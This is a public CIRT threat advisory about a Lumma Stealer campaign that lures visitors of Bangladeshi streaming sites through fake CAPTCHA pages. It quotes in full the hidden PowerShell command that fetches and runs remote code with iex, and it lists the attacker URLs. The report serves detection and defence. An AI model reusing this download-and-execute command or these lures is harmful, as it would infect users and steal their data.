TLP: CLEAR

Distribution: Public

Type of Threat: Stealer Malware (C2)

Date: 08 October 2024

Executive Summary

The Cyber Threat Intelligence (CTI) Unit at BGD e-GOV CIRT has recently identified a stealer malware campaign linked to the notorious Lumma Stealer malware family. Further investigation has revealed that multiple variants of stealer malware are being distributed using similar tactics. This report details how our threat intelligence researchers detected and analyzed this evolving malware campaign.

Our CTI Unit has been actively monitoring stealer malware campaigns and has identified evidence of malwarethat exfiltrates sensitive user information both locally and globally. In a –recent analysis, we detected Lumma Stealer malware being propagated through deceptive CAPTCHA pages. This report will illustrate how users are lured into falling victimto this novel approach of utilizing CAPTCHA pages.

Fig: Globalinfection samples of Lumma C2 variants

Stealer Malware’s Footprint in Bangladesh

Fig: Recently detected Victims sample with stealer malwares in Bangladesh

Infection Chain:

Step 1: InitialAccess via Malicious Hyperlinks

Several websites in Bangladesh, popularfor streaming movies,have been identified as vectors for delivering malicious content to unsuspecting users. When users interact with these websites, they are presented with a convincing CAPTCHA. Upon solving the CAPTCHA, they are instructed to open the Windows RUN prompt and paste a suspiciously long string.

In our case, we found the followingURL were involvedin these attacksas primary web surfing activities:

1. https://tinyzonetv[.]stream

Right after clickingon the above link redirectsusers by opensup a CAPTCHA screen similarto the following URL -

https[:]//s3.ap-southeast-1.wasabisys.com/il4build/access-for-verification-page-05.html?X-Amz- Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-

Credential=MKL7RR2DGMIBE69KPENT%2F20241005%2Fap-southeast-

1%2Fs3%2Faws4_request&X-Amz-Date=20241005T202512Z&X-Amz-Expires=43200&X-Amz- Signature=0a626639486a647545ce6cb94f7e0b7109cb6c34c7ecc9a1486a14b32a81eb9a&X- Amz-SignedHeaders=host&x-id=GetObject

When a user tries to refresh the screen with clicking on “I’m not a robot”, in background the page generates a PowerShell script and automatically it copies the PowerShell script in clipboard and it instruct user to run the script from user’s command line.

Step 2: Execution of PowerShell Commands

When the user does the activities as per instruction on the malicious URL, the following PowerShell script will execute on user’s device and perform the activities according to the below script.

powershell.exe -W Hidden -command $url = ''https://go-for-zip.b- cdn.net/il/4/file/n4.txt''; $response = Invoke-WebRequest -Uri $url - UseBasicParsing; $text = $response.Content; iex $text

Breakdown of the PowerShell Command:

1. powershell.exe -W Hidden: This runs PowerShell inhidden mode, concealing the execution from the user.
2. $url = ''https://go-for-zip.b-cdn.net/il/4/file/n4[.]txt'': A URL points to a remote file hosted on an external server.
3. $response = Invoke-WebRequest -Uri $url -UseBasicParsing: This command fetches the contents of the remote file using Invoke-WebRequest.
4. $text = $response.Content: The contents retrievedfrom the file are stored in the variable $text.

To see the full document, Please Click Here.